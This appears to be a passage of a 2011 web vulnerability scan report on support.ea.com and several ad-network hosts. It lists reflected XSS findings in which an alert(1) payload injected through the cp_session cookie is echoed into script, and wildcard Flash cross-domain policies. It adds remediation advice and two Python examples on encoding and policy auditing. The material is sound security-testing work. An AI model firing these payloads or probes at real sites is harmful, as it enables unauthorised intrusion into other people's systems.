Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where it cannot be avoided, the value must be encoded for a JavaScript string literal rather than merely HTML-encoded or backslash-escaped: every character outside [A-Za-z0-9] should be emitted as \xHH or \uHHHH. Escaping only the double quote is not enough, because the HTML parser terminates the script element at the first </script sequence it sees regardless of JavaScript quoting, so < and / must be encoded too. Alternatively, pass the value to the script through a data attribute or a JSON document with the same encoding applied, and read it from the DOM.

Request

GET /app/answers/detail/a_id/3628 HTTP/1.1
Host: support.ea.com
Proxy-Connection: keep-alive
Referer: http://support.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CEM-session=50ishjhd22sfunvecnibh6mej7; __utmz=103303007.1308923026.1.1.utmcsr=aboutus.ea.com|utmccn=(referral)|utmcmd=referral|utmcct=/ea_outreach.action; __utma=103303007.346541957.1308923026.1308923026.1308923026.1; __utmc=103303007; __utmb=103303007.1.10.1308923026; s_ria=flash%2010%7Csilverlight%20not%20detected; s_sivo=US%3AEACOM%3ANONE; s_pv=NA%3AUS%3AEA%3ANONE%3AMKT%3ANONE%3AEACOM%3ANONE%3APRODUCTEULAS; s_ppv=7; s_cc=true; cp_session=aUVJ8dT1kyDausb%7Eh_bFiS7qw_UUe4csS3t_7t2XSRu2xT4Rw_utv%7Ed4aiCmSuKJB08Gak%7EHWcm0ISPK9SiD3Q4zt2F7FUcieOWOwbX9de0v5fIS_t8F%7E4WjauP%7EbsABNKlAA44bEVwuaUqqwcE8ZFXvCBwnBx6NHO8mMQtG9g_Dt6EBTeufVzKVUyz5AGdfSCoCY95rAJXfspuz%7EQJa_lGeTy6cVRUd0a_ZKq8IY2cOLSDVM_q8Amt1aPx0KIIPjxEeoR0tvR0UA%2131232"%3balert(1)//5a7be544b54; evar1=Not%20Logged%20In; s_sq=eacustomerservice%3D%2526pid%253DSupport%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//support.ea.com/app/answers/detail/a_id/3628%2526ot%253DA%26eaeabrandna%3D%2526pid%253Dhttp%25253A%25252F%25252Finvestors.ea.com%25252F%2526oid%253Dhttp%25253A%25252F%25252Feastore.ea.com%25252F%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:49:07 GMT
Server: Apache
Cache-Control: no-cache
Expires: -1
Pragma: no-cache
Set-Cookie: cp_session=aUDsqYmgYJMhp1hD9nKO0sNeg8BKvlvpEO1Hlt4IFQnl0_Kqb6yTJB2T5Y3FFKMuDpSqD98pb05irCIMWMKOzRXqv3CvKgSsRqfJw2i1PR2UK4CN7%7ExoU5tQ26gWCPzVZ9IBv7E%7Ec8QPwqsjCIEy04gYBBauqjL62FdPznk0JzYuZVxDt2QCbX5FY%7EPN%7E_p7JSPyqa8HHU5xA%21; path=/; httponly
Set-Cookie: accType=deleted; expires=Thu, 24-Jun-2010 13:49:07 GMT
RNT-Time: D=228615 t=1308923347946099
RNT-Machine: 19
Vary: Accept-Encoding
Content-Length: 74319
X-Cnection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US">
<hea
...[SNIP]...
k~HWcm0ISPK9SiD3Q4zt2F7FUcieOWOwbX9de0v5fIS_t8F~4WjauP~bsABNKlAA44bEVwuaUqqwcE8ZFXvCBwnBx6NHO8mMQtG9g_Dt6EBTeufVzKVUyz5AGdfSCoCY95rAJXfspuz~QJa_lGeTy6cVRUd0a_ZKq8IY2cOLSDVM_q8Amt1aPx0KIIPjxEeoR0tvR0UA!31232";alert(1)//5a7be544b54";
s.prop11="";
s.prop6 = "";
s.prop7 = "";
s.prop8 = "";
s.prop12 = "";
s.prop13 = "";
s.prop16 = "";
s.prop17 = "";
var theBody=document.body;
if (theBody && document.body.addBehavior)
theBody.addBe
...[SNIP]...

4.165. http://support.ea.com/app/answers/detail/a_id/4394 [cp_session cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://support.ea.com
Path:   /app/answers/detail/a_id/4394

Issue detail

The value of the cp_session cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65dda"%3balert(1)//5e371188cf5 was submitted in the cp_session cookie. This input was echoed as 65dda";alert(1)//5e371188cf5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability, for example script execution on any host that can set cookies for the same domain (a cookie set with a parent-domain attribute is sent to every subdomain), or a separate header-injection flaw on this host. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where it cannot be avoided, the value must be encoded for a JavaScript string literal rather than merely HTML-encoded or backslash-escaped: every character outside [A-Za-z0-9] should be emitted as \xHH or \uHHHH. Escaping only the double quote is not enough, because the HTML parser terminates the script element at the first </script sequence it sees regardless of JavaScript quoting, so < and / must be encoded too. Alternatively, pass the value to the script through a data attribute or a JSON document with the same encoding applied, and read it from the DOM.
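The remediation paragraph above is repeated on every script-context issue in this section (the Referer issues 4.159 and 4.160 and the cp_session issues 4.163 to 4.165), and the two payload styles the report used are exactly the two ways a double-quoted JavaScript string gets broken out of. The following is an added example written for this edit, not code from the report or from the scanned sites: it takes the two payloads as they appear in the report, renders them into a hypothetical page fragment modelled on the s.referrer assignment, and checks the result against both an HTML-level and a JavaScript-level test to show why escaping only the quote leaves the </script> payload live while full \xHH encoding neutralises both. The template name, the encoders and the checks are the editor's own assumptions.

```python
"""Why escaping the double quote is not enough inside a <script> block.

Added example (not from the scan report or from the scanned sites). The two
payloads are the ones the report shows echoed into a double-quoted JavaScript
string; the template, the encoders and the checks are the editor's own.
"""
import re

# Payloads copied from the report: issue 4.159 (Referer) and 4.163 (cp_session).
PAYLOAD_SCRIPT_BREAKOUT = '30799</script><script>alert(1)</script>4c0d8e0492b'
PAYLOAD_STRING_BREAKOUT = '963d4";alert(1)//16be0394141'

# Hypothetical page fragment modelled on the s.referrer line in the responses.
TEMPLATE = '<script>\ns.referrer="{}";\n</script>'


def render_naive(value):
    """Vulnerable: the header/cookie value is copied into the literal unchanged."""
    return TEMPLATE.format(value)


def escape_quotes_only(value):
    """Common half-fix: backslash-escape only the backslash and the double quote."""
    return value.replace('\\', '\\\\').replace('"', '\\"')


def js_string_encode(value):
    """Emit every character outside [A-Za-z0-9] as \\xHH or \\uHHHH. '<' and '/'
    are covered, so the sequence '</script' can never appear in the output."""
    out = []
    for ch in value:
        cp = ord(ch)
        if ch.isascii() and ch.isalnum():
            out.append(ch)
        elif cp < 0x100:
            out.append('\\x%02x' % cp)
        else:
            out.append('\\u%04x' % cp)
    return ''.join(out)


def render_fixed(value):
    """Safe: the value can only ever be string data inside the literal."""
    return TEMPLATE.format(js_string_encode(value))


_SCRIPT_END = re.compile(r'</script', re.IGNORECASE)


def html_closes_script_early(html):
    """The HTML tokenizer ends a <script> element at the first '</script' it meets,
    whatever the JavaScript quoting state. True if that happens before the
    template's own closing tag."""
    body = html[len('<script>'):]
    first = _SCRIPT_END.search(body)
    return first is not None and first.start() < body.rfind('</script>')


def js_string_literal_is_whole(line):
    """Scan the literal in 's.referrer="...";' the way a JS lexer would and report
    whether it closes exactly where the template intended (just before the ';')."""
    i = len('s.referrer="')
    while i < len(line):
        ch = line[i]
        if ch == '\\':
            i += 2                      # escape sequence: skip the escaped char
            continue
        if ch == '"':
            return line[i + 1:] == ';'  # anything else means code was injected
        i += 1
    return False                        # literal never closed: syntax error


def assess(html):
    """Run both checks on a rendered fragment; safe output is False / True."""
    line = html.split('\n')[1]
    return {'script_closed_early': html_closes_script_early(html),
            'string_literal_whole': js_string_literal_is_whole(line)}


if __name__ == '__main__':
    renderers = (('naive', render_naive),
                 ('quotes-only', lambda v: render_naive(escape_quotes_only(v))),
                 ('js-string-encoded', render_fixed))
    for name, render in renderers:
        for payload in (PAYLOAD_SCRIPT_BREAKOUT, PAYLOAD_STRING_BREAKOUT):
            print('%-18s %-14s %s' % (name, payload[:12], assess(render(payload))))
```

The quotes-only encoder passes the JavaScript-level check for the ";alert(1)// payload but still fails the HTML-level check for the </script> payload, which is the point the remediation text makes: the two parsers run in sequence, and the HTML tokenizer wins.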

Request

GET /app/answers/detail/a_id/4394 HTTP/1.1
Host: support.ea.com
Proxy-Connection: keep-alive
Referer: http://support.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CEM-session=50ishjhd22sfunvecnibh6mej7; __utmz=103303007.1308923026.1.1.utmcsr=aboutus.ea.com|utmccn=(referral)|utmcmd=referral|utmcct=/ea_outreach.action; __utma=103303007.346541957.1308923026.1308923026.1308923026.1; __utmc=103303007; __utmb=103303007.1.10.1308923026; s_ria=flash%2010%7Csilverlight%20not%20detected; s_sivo=US%3AEACOM%3ANONE; s_pv=NA%3AUS%3AEA%3ANONE%3AMKT%3ANONE%3AEACOM%3ANONE%3APRODUCTEULAS; s_ppv=7; s_cc=true; cp_session=aUVJ8dT1kyDausb%7Eh_bFiS7qw_UUe4csS3t_7t2XSRu2xT4Rw_utv%7Ed4aiCmSuKJB08Gak%7EHWcm0ISPK9SiD3Q4zt2F7FUcieOWOwbX9de0v5fIS_t8F%7E4WjauP%7EbsABNKlAA44bEVwuaUqqwcE8ZFXvCBwnBx6NHO8mMQtG9g_Dt6EBTeufVzKVUyz5AGdfSCoCY95rAJXfspuz%7EQJa_lGeTy6cVRUd0a_ZKq8IY2cOLSDVM_q8Amt1aPx0KIIPjxEeoR0tvR0UA%2165dda"%3balert(1)//5e371188cf5; evar1=Not%20Logged%20In; s_sq=eacustomerservice%3D%2526pid%253DSupport%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//support.ea.com/app/answers/detail/a_id/4394%2526ot%253DA%26eaeabrandna%3D%2526pid%253Dhttp%25253A%25252F%25252Finvestors.ea.com%25252F%2526oid%253Dhttp%25253A%25252F%25252Feastore.ea.com%25252F%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:49:10 GMT
Server: Apache
Cache-Control: no-cache
Expires: -1
Pragma: no-cache
Set-Cookie: cp_session=aU43fR4BA0ZZHLei9yTMdQgMwlKsgEIfAz%7EHxOHekrQ2b6%7EJihCKHi0iV32rZ%7E9e8ugrsLn1xUe8AtsjYMTvSo2aJTQ9pjjZJOx7FxT48zcSBv6I5ZC_GV9veZsIKxwUtB11gkquTHXSu_ZXHHscdGsIA0c03Y9RnG4ogkmvfpY3MC0fdTbw0toXcQihKh90VBov8jksOXsEQ%21; path=/; httponly
Set-Cookie: accType=deleted; expires=Thu, 24-Jun-2010 13:49:09 GMT
RNT-Time: D=264065 t=1308923350670541
RNT-Machine: 12
Vary: Accept-Encoding
Content-Length: 83870
X-Cnection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US">
<hea
...[SNIP]...
k~HWcm0ISPK9SiD3Q4zt2F7FUcieOWOwbX9de0v5fIS_t8F~4WjauP~bsABNKlAA44bEVwuaUqqwcE8ZFXvCBwnBx6NHO8mMQtG9g_Dt6EBTeufVzKVUyz5AGdfSCoCY95rAJXfspuz~QJa_lGeTy6cVRUd0a_ZKq8IY2cOLSDVM_q8Amt1aPx0KIIPjxEeoR0tvR0UA!65dda";alert(1)//5e371188cf5";
s.prop11="";
s.prop6 = "";
s.prop7 = "";
s.prop8 = "";
s.prop12 = "";
s.prop13 = "";
s.prop16 = "";
s.prop17 = "";
var theBody=document.body;
if (theBody && document.body.addBehavior)
theBody.addBe
...[SNIP]...

5. Flash cross-domain policy
There are 15 instances of this issue:

Issue background

The Flash cross-domain policy (crossdomain.xml) controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy: a SWF served from an allowed domain may send requests to this host with the user's cookies attached and read the full responses. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user. In CORS terms this is the equivalent of reflecting any Origin with credentials allowed.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains. List specific hosts in allow-access-from rather than "*" or a broad "*.example.com", keep secure="true" (the default) on hosts served over HTTPS so that a SWF loaded over plain HTTP cannot read HTTPS responses, and declare site-control permitted-cross-domain-policies="master-only" so that policy files elsewhere on the host cannot widen what the master policy grants.
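The fifteen findings that follow all reduce to the same few attributes in a short XML document, which makes this a check worth automating rather than eyeballing. The following is an added example written for this edit, not code from the report or from any of the hosts listed: it parses crossdomain.xml documents with the standard library and flags the permissive settings named above (a wildcard domain, secure="false", a wildcard subdomain, permitted-cross-domain-policies="all" and an open allow-http-request-headers-from). The sample policies are constructed: three follow the visible lines of the bodies shown for a.netmng.com (5.1), fls.doubleclick.net (5.5) and ib.adnxs.com (5.6) with the DOCTYPE line dropped, and the other two are a tightened policy and an open-headers policy added for contrast. The finding names and the severity mapping are the editor's, not Burp's.

```python
"""Audit crossdomain.xml for the permissive settings flagged in section 5.

Added example (not from the scan report). The sample policies are constructed:
'netmng', 'doubleclick_fls' and 'adnxs' follow the visible lines of issues 5.1,
5.5 and 5.6 with the DOCTYPE dropped; 'scoped' and 'open_headers' are made up
for contrast. Finding names and severities are the editor's, not Burp's.
"""
import xml.etree.ElementTree as ET
from typing import List

SAMPLES = {
    'netmng': '<?xml version="1.0"?>\n'
              '<cross-domain-policy>\n'
              '<allow-access-from domain="*" />\n'
              '</cross-domain-policy>',
    'doubleclick_fls': '<?xml version="1.0"?>\n'
                       '<cross-domain-policy>\n'
                       '<allow-access-from domain="*" secure="false"/>\n'
                       '</cross-domain-policy>',
    'adnxs': '<?xml version="1.0"?>'
             '<cross-domain-policy>'
             '<site-control permitted-cross-domain-policies="master-only"/>'
             '<allow-access-from domain="*"/>'
             '</cross-domain-policy>',
    # Constructed tightened policy: named hosts only, HTTPS-only, master-only.
    'scoped': '<?xml version="1.0"?>\n'
              '<cross-domain-policy>\n'
              '<site-control permitted-cross-domain-policies="master-only"/>\n'
              '<allow-access-from domain="www.example.com" secure="true"/>\n'
              '<allow-access-from domain="static.example.com"/>\n'
              '</cross-domain-policy>',
    # Constructed: no wildcard domain, but any SWF may send arbitrary headers.
    'open_headers': '<?xml version="1.0"?>\n'
                    '<cross-domain-policy>\n'
                    '<allow-access-from domain="www.example.com"/>\n'
                    '<allow-http-request-headers-from domain="*" headers="*"/>\n'
                    '</cross-domain-policy>',
}

HIGH = {'wildcard-domain', 'site-control-all'}


def audit_policy(xml_text: str) -> List[str]:
    """Return the list of permissive settings found, in document order."""
    root = ET.fromstring(xml_text)
    if root.tag != 'cross-domain-policy':
        raise ValueError('not a cross-domain-policy document: ' + root.tag)
    findings = []
    sc = root.find('site-control')
    if sc is not None and sc.get('permitted-cross-domain-policies') == 'all':
        findings.append('site-control-all')       # any file on the host may grant more
    for el in root.findall('allow-access-from'):
        domain = el.get('domain', '')
        if domain == '*':
            findings.append('wildcard-domain')    # every origin gets credentialed reads
        elif domain.startswith('*.'):
            findings.append('wildcard-subdomain:' + domain)
        if el.get('secure', 'true').lower() == 'false':
            findings.append('secure-false:' + domain)  # HTTP SWFs may read HTTPS data
    for el in root.findall('allow-http-request-headers-from'):
        if el.get('domain') == '*':
            findings.append('wildcard-request-headers')
    return findings


def severity(findings: List[str]) -> str:
    """Editor's mapping: wildcard access or 'all' policies are High, the rest Medium."""
    if any(f in HIGH for f in findings):
        return 'High'
    return 'Medium' if findings else 'None'


if __name__ == '__main__':
    for name, policy in SAMPLES.items():
        found = audit_policy(policy)
        print('%-16s %-6s %s' % (name, severity(found), found))
```

Run against a live host, the same function applies to the bytes returned for /crossdomain.xml; note that the interclick body in 5.7 begins with a byte-order mark, which ElementTree tolerates when given bytes rather than a decoded string.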


5.1. http://a.netmng.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.netmng.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a.netmng.com

Response

HTTP/1.1 200 OK
Date: Sat, 25 Jun 2011 02:10:59 GMT
Server: Apache/2.2.9
Last-Modified: Fri, 07 May 2010 14:42:29 GMT
ETag: "6c1d1-6a-4860211879f40"
Accept-Ranges: bytes
Content-Length: 106
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

5.2. http://ad.doubleclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 21:42:14 GMT
Date: Fri, 24 Jun 2011 13:22:40 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

5.3. http://d.adroll.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.adroll.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d.adroll.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Fri, 24 Jun 2011 13:20:42 GMT
Content-Type: text/xml
Content-Length: 201
Last-Modified: Thu, 09 Jun 2011 00:14:49 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

5.4. http://d1.openx.org/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://d1.openx.org
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d1.openx.org

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:20:36 GMT
Server: Apache
Last-Modified: Tue, 31 Aug 2010 01:04:36 GMT
ETag: "464005-c7-48f142a249100"
Accept-Ranges: bytes
Content-Length: 199
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

5.5. http://fls.doubleclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Thu, 23 Jun 2011 20:45:52 GMT
Expires: Tue, 17 May 2011 18:17:24 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 60179
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

5.6. http://ib.adnxs.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ib.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sat, 25-Jun-2011 13:18:33 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Thu, 22-Sep-2011 13:18:33 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

5.7. http://idcs.interclick.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://idcs.interclick.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: idcs.interclick.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 23 Jun 2011 03:34:28 GMT
Accept-Ranges: bytes
ETag: "f5f224755631cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Sat, 25 Jun 2011 02:14:00 GMT
Connection: close
Content-Length: 225

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

5.8. http://m.adnxs.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://m.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: m.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sat, 25-Jun-2011 13:18:55 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Thu, 22-Sep-2011 13:18:55 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

5.9. http://rcci.122.2o7.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://rcci.122.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: rcci.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:29:05 GMT
Server: Omniture DC/2.0.0
xserver: www430
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

5.10. http://segment-pixel.invitemedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: segment-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Fri, 24 Jun 2011 13:18:32 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

5.11. http://swsoft.122.2o7.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://swsoft.122.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: swsoft.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Sat, 25 Jun 2011 02:11:01 GMT
Server: Omniture DC/2.0.0
xserver: www265
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

5.12. http://wotifcom.112.2o7.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://wotifcom.112.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: wotifcom.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:20:41 GMT
Server: Omniture DC/2.0.0
xserver: www609
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

5.13. http://googleads.g.doubleclick.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Fri, 27 May 2011 17:28:41 GMT
Date: Thu, 23 Jun 2011 15:24:40 GMT
Expires: Fri, 24 Jun 2011 15:24:40 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 78835
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
